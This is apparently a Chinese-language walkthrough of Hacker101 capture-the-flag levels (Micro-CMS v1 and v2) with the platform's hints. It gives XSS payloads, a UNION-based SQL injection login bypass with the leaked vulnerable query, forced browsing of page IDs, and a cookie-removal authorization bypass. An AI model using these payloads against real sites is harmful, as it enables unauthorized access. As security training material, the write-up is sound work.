hacker101

hacker101

A little something to get you started (Trivial (1))

在源码里有:

1
2
3
4
5
<style>
body {
background-image: url("background.png");
}
</style>

访问background.png得到flag。

Micro-CMS v1 (Easy (2))

flag1

在页面的编辑页,URL类似于/page/edit/2,可能有注入,在最后一个数字后加一个单引号弹出flag。

flag2

在Markdown Test的页面元素里可以看到一个html标签而且这个标签成功解析。尝试XSS。

新建一个page,在标题里输入<script>alert(1)</script>,点击<-- Go Home弹出flag。

flag3

和flag2类似,在文章中也可以XSS,payload如下:

1
<img src=1 onerror=javascript:alert(1) />

在源码中找到flag。

flag4

找页面发现page3是404,但page4是403,访问/page/edit/4获得flag。

Hints:

Flag0

  • Try creating a new page
  • How are pages indexed?
  • Look at the sequence of IDs
  • If the front door doesn’t open, try the window
  • In what ways can you retrieve page contents?

Flag1

  • Make sure you tamper with every input
  • Have you tested for the usual culprits? XSS, SQL injection, path injection
  • Bugs often occur when an input should always be one type and turns out to be another
  • Remember, form submissions aren’t the only inputs that come from browsers

Flag2

  • Sometimes a given input will affect more than one page
  • The bug you are looking for doesn’t exist in the most obvious place this input is shown

Flag3

  • Script tags are great, but what other options do you have?

Micro-CMS v2 (Moderate (3))

flag1

在v2里有一个changelog:

1
This version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.

在Create a new page需要登录。

使用admin'加单引号登录报错:

1
2
3
4
5
6
7
8
Traceback (most recent call last):
File "./main.py", line 145, in do_login
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
self.errorhandler(self, exc, value)
File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1")

看到sql语句是:

1
SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')

使用payload:

1
2
Username: admin' union select 123 as password;--+
Password: 123

登录成功后看到Private Page得到flag。

flag2

提示说:

1
What actions could you perform as a regular user on the last level, which you can't now?

页面编辑页面是只有登录才可以进行修改的,但是获取API后把cookie删除就可以获得flag。

API内容:

1
2
POST:
title=test&body=123

flag3

0%